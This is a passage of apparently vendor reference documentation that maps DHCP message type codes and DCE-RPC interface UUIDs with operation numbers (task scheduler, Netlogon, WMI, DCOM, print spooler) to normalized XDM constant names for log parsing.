12 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEUNKNOWN [RFC4388]

13 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEACTIVE [RFC4388]

14 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPBULKLEASEQUERY [RFC6926]

15 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEQUERYDONE [RFC6926]

16 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPACTIVELEASEQUERY [RFC7724]

17 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEQUERYSTATUS [RFC7724]

18 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPTLS [RFC7724]

3.14 | XDM_CONST.DCERPC_OPERATION
RPC endpoints

Original Mapped Description

1ff70682-0a51-30e8-076d-740be8cee98b:0 XDM_CONST.DCERPC_OPERATION_NETR_JOB_ADD

1ff70682-0a51-30e8-076d-740be8cee98b:1 XDM_CONST.DCERPC_OPERATION_NETR_JOB_DEL

1ff70682-0a51-30e8-076d-740be8cee98b:2 XDM_CONST.DCERPC_OPERATION_NETR_JOB_ENUM

1ff70682-0a51-30e8-076d-740be8cee98b:3 XDM_CONST.DCERPC_OPERATION_NETR_JOB_GET_INFO

378e52b0-c0a9-11cf-822d-00aa0051e40f:0 XDM_CONST.DCERPC_OPERATION_SA_SET_ACCOUNT_INFORMATION

378e52b0-c0a9-11cf-822d-00aa0051e40f:1 XDM_CONST.DCERPC_OPERATION_SA_SET_NS_ACCOUNT_INFORMATION

378e52b0-c0a9-11cf-822d-00aa0051e40f:2 XDM_CONST.DCERPC_OPERATION_SA_GET_NS_ACCOUNT_INFORMATION

378e52b0-c0a9-11cf-822d-00aa0051e40f:3 XDM_CONST.DCERPC_OPERATION_SA_GET_ACCOUNT_INFORMATION

0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:0 XDM_CONST.DCERPC_OPERATION_IT_SRV_REGISTER_IDLE_TASK

0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:1 XDM_CONST.DCERPC_OPERATION_IT_SRV_UNREGISTER_IDLE_TASK

0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:2 XDM_CONST.DCERPC_OPERATION_IT_SRV_PROCESS_IDLE_TASKS

0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:3 XDM_CONST.DCERPC_OPERATION_IT_SRV_SET_DETECTION_PARAMETERS

86d35949-83c9-4044-b424-db363231fd0c:0 XDM_CONST.DCERPC_OPERATION_SCH_RPC_HIGHEST_VERSION

86d35949-83c9-4044-b424-db363231fd0c:1 XDM_CONST.DCERPC_OPERATION_SCH_RPC_REGISTER_TASK

86d35949-83c9-4044-b424-db363231fd0c:2 XDM_CONST.DCERPC_OPERATION_SCH_RPC_RETRIEVE_TASK

86d35949-83c9-4044-b424-db363231fd0c:3 XDM_CONST.DCERPC_OPERATION_SCH_RPC_CREATE_FOLDER

86d35949-83c9-4044-b424-db363231fd0c:4 XDM_CONST.DCERPC_OPERATION_SCH_RPC_SET_SECURITY

86d35949-83c9-4044-b424-db363231fd0c:5 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_SECURITY

86d35949-83c9-4044-b424-db363231fd0c:6 XDM_CONST.DCERPC_OPERATION_SCH_RPC_ENUM_FOLDER
 Original Mapped Description

86d35949-83c9-4044-b424-db363231fd0c:7 XDM_CONST.DCERPC_OPERATION_SCH_RPC_ENUM_TASKS

86d35949-83c9-4044-b424-db363231fd0c:8 XDM_CONST.DCERPC_OPERATION_SCH_RPC_ENUM_INSTANCES

86d35949-83c9-4044-b424-db363231fd0c:9 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_INSTANCE_INFO

86d35949-83c9-4044-b424-db363231fd0c:10 XDM_CONST.DCERPC_OPERATION_SCH_RPC_STOP_INSTANCE

86d35949-83c9-4044-b424-db363231fd0c:11 XDM_CONST.DCERPC_OPERATION_SCH_RPC_STOP

86d35949-83c9-4044-b424-db363231fd0c:12 XDM_CONST.DCERPC_OPERATION_SCH_RPC_RUN

86d35949-83c9-4044-b424-db363231fd0c:13 XDM_CONST.DCERPC_OPERATION_SCH_RPC_DELETE

86d35949-83c9-4044-b424-db363231fd0c:14 XDM_CONST.DCERPC_OPERATION_SCH_RPC_RENAME

86d35949-83c9-4044-b424-db363231fd0c:15 XDM_CONST.DCERPC_OPERATION_SCH_RPC_SCHEDULED_RUNTIMES

86d35949-83c9-4044-b424-db363231fd0c:16 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_LAST_RUN_INFO

86d35949-83c9-4044-b424-db363231fd0c:17 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_TASK_INFO

99fcfec4-5260-101b-bbcb-00aa0021347a:0 XDM_CONST.DCERPC_OPERATION_RESOLVE_OXID

99fcfec4-5260-101b-bbcb-00aa0021347a:1 XDM_CONST.DCERPC_OPERATION_SIMPLE_PING

99fcfec4-5260-101b-bbcb-00aa0021347a:2 XDM_CONST.DCERPC_OPERATION_COMPLEX_PING

99fcfec4-5260-101b-bbcb-00aa0021347a:3 XDM_CONST.DCERPC_OPERATION_SERVER_ALIVE

99fcfec4-5260-101b-bbcb-00aa0021347a:4 XDM_CONST.DCERPC_OPERATION_RESOLVE_OXID2

99fcfec4-5260-101b-bbcb-00aa0021347a:5 XDM_CONST.DCERPC_OPERATION_SERVER_ALIVE2

4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0 XDM_CONST.DCERPC_OPERATION_REMOTE_ACTIVATION

f5cc5a18-4264-101a-8c59-08002b2f8426:0 XDM_CONST.DCERPC_OPERATION_NSPI_BIND

f5cc5a18-4264-101a-8c59-08002b2f8426:1 XDM_CONST.DCERPC_OPERATION_NSPI_UNBIND

f5cc5a18-4264-101a-8c59-08002b2f8426:2 XDM_CONST.DCERPC_OPERATION_NSPI_UPDATE_STAT

f5cc5a18-4264-101a-8c59-08002b2f8426:3 XDM_CONST.DCERPC_OPERATION_NSPI_QUERY_ROWS

f5cc5a18-4264-101a-8c59-08002b2f8426:4 XDM_CONST.DCERPC_OPERATION_NSPI_SEEK_ENTRIES

f5cc5a18-4264-101a-8c59-08002b2f8426:5 XDM_CONST.DCERPC_OPERATION_NSPI_GET_MATCHES

f5cc5a18-4264-101a-8c59-08002b2f8426:6 XDM_CONST.DCERPC_OPERATION_NSPI_RESORT_RESTRICTION

f5cc5a18-4264-101a-8c59-08002b2f8426:7 XDM_CONST.DCERPC_OPERATION_NSPI_DN_TO_EPH

f5cc5a18-4264-101a-8c59-08002b2f8426:8 XDM_CONST.DCERPC_OPERATION_NSPI_GET_PROP_LIST

f5cc5a18-4264-101a-8c59-08002b2f8426:9 XDM_CONST.DCERPC_OPERATION_NSPI_GET_PROPS

9556dc99-828c-11cf-a37e-00aa003240c7:3 XDM_CONST.DCERPC_OPERATION_OPEN_NAMESPACE

9556dc99-828c-11cf-a37e-00aa003240c7:4 XDM_CONST.DCERPC_OPERATION_CANCEL_ASYNC_CALL

9556dc99-828c-11cf-a37e-00aa003240c7:5 XDM_CONST.DCERPC_OPERATION_QUERY_OBJECT_SINK

9556dc99-828c-11cf-a37e-00aa003240c7:6 XDM_CONST.DCERPC_OPERATION_GET_OBJECT

9556dc99-828c-11cf-a37e-00aa003240c7:7 XDM_CONST.DCERPC_OPERATION_GET_OBJECT_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:8 XDM_CONST.DCERPC_OPERATION_PUT_CLASS

9556dc99-828c-11cf-a37e-00aa003240c7:9 XDM_CONST.DCERPC_OPERATION_PUT_CLASS_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:10 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS

9556dc99-828c-11cf-a37e-00aa003240c7:11 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:12 XDM_CONST.DCERPC_OPERATION_CREATE_CLASS_ENUM

9556dc99-828c-11cf-a37e-00aa003240c7:13 XDM_CONST.DCERPC_OPERATION_CREATE_CLASS_ENUM_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:14 XDM_CONST.DCERPC_OPERATION_PUT_INSTANCE

9556dc99-828c-11cf-a37e-00aa003240c7:15 XDM_CONST.DCERPC_OPERATION_PUT_INSTANCE_ASYNC
 Original Mapped Description

9556dc99-828c-11cf-a37e-00aa003240c7:16 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS

9556dc99-828c-11cf-a37e-00aa003240c7:17 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:18 XDM_CONST.DCERPC_OPERATION_CREATE_INSTANCE_ENUM

9556dc99-828c-11cf-a37e-00aa003240c7:19 XDM_CONST.DCERPC_OPERATION_CREATE_INSTANCE_ENUM_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:20 XDM_CONST.DCERPC_OPERATION_EXEC_QUERY

9556dc99-828c-11cf-a37e-00aa003240c7:21 XDM_CONST.DCERPC_OPERATION_EXEC_QUERY_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:22 XDM_CONST.DCERPC_OPERATION_EXEC_NOTIFICATION_QUERY

9556dc99-828c-11cf-a37e-00aa003240c7:23 XDM_CONST.DCERPC_OPERATION_EXEC_NOTIFICATION_QUERY_ASYNC

9556dc99-828c-11cf-a37e-00aa003240c7:24 XDM_CONST.DCERPC_OPERATION_EXEC_METHOD

9556dc99-828c-11cf-a37e-00aa003240c7:25 XDM_CONST.DCERPC_OPERATION_EXEC_METHOD_ASYNC

f309ad18-d86a-11d0-a075-00c04fb68820:3 XDM_CONST.DCERPC_OPERATION_ESTABLISH_POSITION

f309ad18-d86a-11d0-a075-00c04fb68820:4 XDM_CONST.DCERPC_OPERATION_REQUEST_CHALLENGE

f309ad18-d86a-11d0-a075-00c04fb68820:5 XDM_CONST.DCERPC_OPERATION_WBEM_LOGIN

f309ad18-d86a-11d0-a075-00c04fb68820:6 XDM_CONST.DCERPC_OPERATION_NTLM_LOGIN

f5cc59b4-4264-101a-8c59-08002b2f8426:0 XDM_CONST.DCERPC_OPERATION_FRS_RPC_SEND_COMM_PKT

f5cc59b4-4264-101a-8c59-08002b2f8426:1 XDM_CONST.DCERPC_OPERATION_FRS_RPC_VERIFY_PROMOTION_PARENT

f5cc59b4-4264-101a-8c59-08002b2f8426:2 XDM_CONST.DCERPC_OPERATION_FRS_RPC_START_PROMOTION_PARENT

f5cc59b4-4264-101a-8c59-08002b2f8426:3 XDM_CONST.DCERPC_OPERATION_FRS_NOP

f5cc59b4-4264-101a-8c59-08002b2f8426:4 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE

f5cc59b4-4264-101a-8c59-08002b2f8426:5 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE

f5cc59b4-4264-101a-8c59-08002b2f8426:6 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE

f5cc59b4-4264-101a-8c59-08002b2f8426:7 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE

f5cc59b4-4264-101a-8c59-08002b2f8426:8 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE

f5cc59b4-4264-101a-8c59-08002b2f8426:9 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE

f5cc59b4-4264-101a-8c59-08002b2f8426:10 XDM_CONST.DCERPC_OPERATION_FRS_RPC_VERIFY_PROMOTION_PARENT_EX

00000143-0000-0000-c000-000000000046:0 XDM_CONST.DCERPC_OPERATION_QUERY_INTERFACE

00000143-0000-0000-c000-000000000046:1 XDM_CONST.DCERPC_OPERATION_ADD_REF

00000143-0000-0000-c000-000000000046:2 XDM_CONST.DCERPC_OPERATION_RELEASE

00000143-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_REM_QUERY_INTERFACE

00000143-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_REM_ADD_REF

00000143-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_REM_RELEASE

00000143-0000-0000-c000-000000000046:6 XDM_CONST.DCERPC_OPERATION_REM_QUERY_INTERFACE2

000001a0-0000-0000-c000-000000000046:0 XDM_CONST.DCERPC_OPERATION_QUERY_INTERFACE_I_REMOTE_SCM_ACTIVATOR

000001a0-0000-0000-c000-000000000046:1 XDM_CONST.DCERPC_OPERATION_ADD_REF_I_REMOTE_ISCM_ACTIVATOR

000001a0-0000-0000-c000-000000000046:2 XDM_CONST.DCERPC_OPERATION_RELEASE_I_REMOTE_ISCM_ACTIVATOR

000001a0-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_REMOTE_GET_CLASS_OBJECT

000001a0-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_REMOTE_CREATE_INSTANCE

12345678-1234-abcd-ef00-01234567cffb:0 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_UAS_LOGON

12345678-1234-abcd-ef00-01234567cffb:1 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_UAS_LOGOFF

12345678-1234-abcd-ef00-01234567cffb:2 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGON

12345678-1234-abcd-ef00-01234567cffb:3 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGOFF
 Original Mapped Description

12345678-1234-abcd-ef00-01234567cffb:4 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_REQ_CHALLENGE

12345678-1234-abcd-ef00-01234567cffb:5 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_AUTHENTICATE

12345678-1234-abcd-ef00-01234567cffb:6 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_PASSWORD_SET

12345678-1234-abcd-ef00-01234567cffb:7 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_DELTAS

12345678-1234-abcd-ef00-01234567cffb:8 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_SYNC

12345678-1234-abcd-ef00-01234567cffb:9 XDM_CONST.DCERPC_OPERATION_NETR_ACCOUNT_DELTAS

12345678-1234-abcd-ef00-01234567cffb:10 XDM_CONST.DCERPC_OPERATION_NETR_ACCOUNT_SYNC

12345678-1234-abcd-ef00-01234567cffb:11 XDM_CONST.DCERPC_OPERATION_NETR_GET_DC_NAME

12345678-1234-abcd-ef00-01234567cffb:12 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_CONTROL

12345678-1234-abcd-ef00-01234567cffb:13 XDM_CONST.DCERPC_OPERATION_NETR_GET_ANY_DC_NAME

12345678-1234-abcd-ef00-01234567cffb:14 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_CONTROL2

12345678-1234-abcd-ef00-01234567cffb:15 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_AUTHENTICATE2

12345678-1234-abcd-ef00-01234567cffb:16 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_SYNC2

12345678-1234-abcd-ef00-01234567cffb:17 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_REDO

12345678-1234-abcd-ef00-01234567cffb:18 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_CONTROL2_EX

12345678-1234-abcd-ef00-01234567cffb:19 XDM_CONST.DCERPC_OPERATION_NETR_ENUMERATE_TRUSTED_DOMAINS

12345678-1234-abcd-ef00-01234567cffb:20 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_NAME

12345678-1234-abcd-ef00-01234567cffb:21 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_CAPABILITIES

12345678-1234-abcd-ef00-01234567cffb:22 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SET_SERVICE_BITS

12345678-1234-abcd-ef00-01234567cffb:23 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_TRUST_RID

12345678-1234-abcd-ef00-01234567cffb:24 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_COMPUTE_SERVER_DIGEST

12345678-1234-abcd-ef00-01234567cffb:25 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_COMPUTE_CLIENT_DIGEST

12345678-1234-abcd-ef00-01234567cffb:26 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_AUTHENTICATE3

12345678-1234-abcd-ef00-01234567cffb:27 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_NAME_EX

12345678-1234-abcd-ef00-01234567cffb:28 XDM_CONST.DCERPC_OPERATION_DSR_GET_SITE_NAME

12345678-1234-abcd-ef00-01234567cffb:29 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_DOMAIN_INFO

12345678-1234-abcd-ef00-01234567cffb:30 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_PASSWORD_SET2

12345678-1234-abcd-ef00-01234567cffb:31 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_PASSWORD_GET

12345678-1234-abcd-ef00-01234567cffb:32 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SEND_TO_SAM

12345678-1234-abcd-ef00-01234567cffb:33 XDM_CONST.DCERPC_OPERATION_DSR_ADDRESS_TO_SITE_NAMES_W

12345678-1234-abcd-ef00-01234567cffb:34 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_NAME_EX2

12345678-1234-abcd-ef00-01234567cffb:35 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_TIME_SERVICE_PARENT_DOMAIN

12345678-1234-abcd-ef00-01234567cffb:36 XDM_CONST.DCERPC_OPERATION_NETR_ENUMERATE_TRUSTED_DOMAINS_EX

12345678-1234-abcd-ef00-01234567cffb:37 XDM_CONST.DCERPC_OPERATION_DSR_ADDRESS_TO_SITE_NAMES_EX_W

12345678-1234-abcd-ef00-01234567cffb:38 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_SITE_COVERAGE_W

12345678-1234-abcd-ef00-01234567cffb:39 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGON_EX

12345678-1234-abcd-ef00-01234567cffb:40 XDM_CONST.DCERPC_OPERATION_DSR_ENUMERATE_DOMAIN_TRUSTS

12345678-1234-abcd-ef00-01234567cffb:41 XDM_CONST.DCERPC_OPERATION_DSR_DEREGISTER_DNS_HOST_RECORDS

12345678-1234-abcd-ef00-01234567cffb:42 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRUST_PASSWORDS_GET

12345678-1234-abcd-ef00-01234567cffb:43 XDM_CONST.DCERPC_OPERATION_DSR_GET_FOREST_TRUST_INFORMATION

12345678-1234-abcd-ef00-01234567cffb:44 XDM_CONST.DCERPC_OPERATION_NETR_GET_FOREST_TRUST_INFORMATION
 Original Mapped Description

12345678-1234-abcd-ef00-01234567cffb:45 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGON_WITH_FLAGS

12345678-1234-abcd-ef00-01234567cffb:46 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_GET_TRUST_INFO

12345678-1234-abcd-ef00-01234567cffb:47 XDM_CONST.DCERPC_OPERATION_UNUSED

12345678-1234-abcd-ef00-01234567cffb:48 XDM_CONST.DCERPC_OPERATION_DSR_UPDATE_READ_ONLY_SERVER_DNS_RECORDS

12345678-1234-abcd-ef00-01234567cffb:49 XDM_CONST.DCERPC_OPERATION_NETR_CHAIN_SET_CLIENT_ATTRIBUTES

76f03f96-cdfd-44fc-a22c-64950a001209:0 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_OPEN_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:1 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:2 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_JOB

76f03f96-cdfd-44fc-a22c-64950a001209:3 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_JOB

76f03f96-cdfd-44fc-a22c-64950a001209:4 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_JOBS

76f03f96-cdfd-44fc-a22c-64950a001209:5 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_JOB

76f03f96-cdfd-44fc-a22c-64950a001209:6 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SCHEDULE_JOB

76f03f96-cdfd-44fc-a22c-64950a001209:7 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:8 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:9 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:10 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_START_DOC_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:11 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_START_PAGE_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:12 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_WRITE_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:13 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_END_PAGE_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:14 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_END_DOC_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:15 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ABORT_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:16 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DATA

76f03f96-cdfd-44fc-a22c-64950a001209:17 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DATA_EX

76f03f96-cdfd-44fc-a22c-64950a001209:18 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PRINTER_DATA

76f03f96-cdfd-44fc-a22c-64950a001209:19 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PRINTER_DATA_EX

76f03f96-cdfd-44fc-a22c-64950a001209:20 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_CLOSE_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:21 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_FORM

76f03f96-cdfd-44fc-a22c-64950a001209:22 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_FORM

76f03f96-cdfd-44fc-a22c-64950a001209:23 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_FORM

76f03f96-cdfd-44fc-a22c-64950a001209:24 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_FORM

76f03f96-cdfd-44fc-a22c-64950a001209:25 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_FORMS

76f03f96-cdfd-44fc-a22c-64950a001209:26 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DRIVER

76f03f96-cdfd-44fc-a22c-64950a001209:27 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_DATA

76f03f96-cdfd-44fc-a22c-64950a001209:28 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_DATA_EX

76f03f96-cdfd-44fc-a22c-64950a001209:29 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_KEY

76f03f96-cdfd-44fc-a22c-64950a001209:30 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DATA

76f03f96-cdfd-44fc-a22c-64950a001209:31 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DATA_EX

76f03f96-cdfd-44fc-a22c-64950a001209:32 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_KEY

76f03f96-cdfd-44fc-a22c-64950a001209:33 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_XCV_DATA

76f03f96-cdfd-44fc-a22c-64950a001209:34 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SEND_RECV_BIDI_DATA

76f03f96-cdfd-44fc-a22c-64950a001209:35 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_CREATE_PRINTER_IC
 Original Mapped Description

76f03f96-cdfd-44fc-a22c-64950a001209:36 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_PLAY_GDI_SCRIPT_ON_PRINTER_IC

76f03f96-cdfd-44fc-a22c-64950a001209:37 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_IC

76f03f96-cdfd-44fc-a22c-64950a001209:38 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTERS

76f03f96-cdfd-44fc-a22c-64950a001209:39 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PRINTER_DRIVER

76f03f96-cdfd-44fc-a22c-64950a001209:40 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_DRIVERS

76f03f96-cdfd-44fc-a22c-64950a001209:41 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DRIVER_DIRECTORY

76f03f96-cdfd-44fc-a22c-64950a001209:42 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DRIVER

76f03f96-cdfd-44fc-a22c-64950a001209:43 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DRIVER_EX

76f03f96-cdfd-44fc-a22c-64950a001209:44 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PRINT_PROCESSOR

76f03f96-cdfd-44fc-a22c-64950a001209:45 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINT_PROCESSORS

76f03f96-cdfd-44fc-a22c-64950a001209:46 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINT_PROCESSOR_DIRECTORY

76f03f96-cdfd-44fc-a22c-64950a001209:47 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PORTS

76f03f96-cdfd-44fc-a22c-64950a001209:48 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_MONITORS

76f03f96-cdfd-44fc-a22c-64950a001209:49 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PORT

76f03f96-cdfd-44fc-a22c-64950a001209:50 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PORT

76f03f96-cdfd-44fc-a22c-64950a001209:51 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_MONITOR

76f03f96-cdfd-44fc-a22c-64950a001209:52 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_MONITOR

76f03f96-cdfd-44fc-a22c-64950a001209:53 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINT_PROCESSOR

76f03f96-cdfd-44fc-a22c-64950a001209:54 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINT_PROCESSOR_DATATYPES

76f03f96-cdfd-44fc-a22c-64950a001209:55 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PER_MACHINE_CONNECTION

76f03f96-cdfd-44fc-a22c-64950a001209:56 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PER_MACHINE_CONNECTION

76f03f96-cdfd-44fc-a22c-64950a001209:57 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PER_MACHINE_CONNECTIONS

76f03f96-cdfd-44fc-a22c-64950a001209:58 XDM_CONST.DCERPC_OPERATION_RPC_SYNC_REGISTER_FOR_REMOTE_NOTIFICATIONS

76f03f96-cdfd-44fc-a22c-64950a001209:59 XDM_CONST.DCERPC_OPERATION_RPC_SYNC_UN_REGISTER_FOR_REMOTE_NOTIFICATIONS

76f03f96-cdfd-44fc-a22c-64950a001209:60 XDM_CONST.DCERPC_OPERATION_RPC_SYNC_REFRESH_REMOTE_NOTIFICATIONS

76f03f96-cdfd-44fc-a22c-64950a001209:61 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_REMOTE_NOTIFICATIONS

76f03f96-cdfd-44fc-a22c-64950a001209:62 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_INSTALL_PRINTER_DRIVER_FROM_PACKAGE

76f03f96-cdfd-44fc-a22c-64950a001209:63 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_UPLOAD_PRINTER_DRIVER_PACKAGE

76f03f96-cdfd-44fc-a22c-64950a001209:64 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_CORE_PRINTER_DRIVERS

76f03f96-cdfd-44fc-a22c-64950a001209:65 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_CORE_PRINTER_DRIVER_INSTALLED

76f03f96-cdfd-44fc-a22c-64950a001209:66 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DRIVER_PACKAGE_PATH

76f03f96-cdfd-44fc-a22c-64950a001209:67 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DRIVER_PACKAGE

76f03f96-cdfd-44fc-a22c-64950a001209:68 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_READ_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:69 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_RESET_PRINTER

76f03f96-cdfd-44fc-a22c-64950a001209:70 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_JOB_NAMED_PROPERTY_VALUE

76f03f96-cdfd-44fc-a22c-64950a001209:71 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_JOB_NAMED_PROPERTY

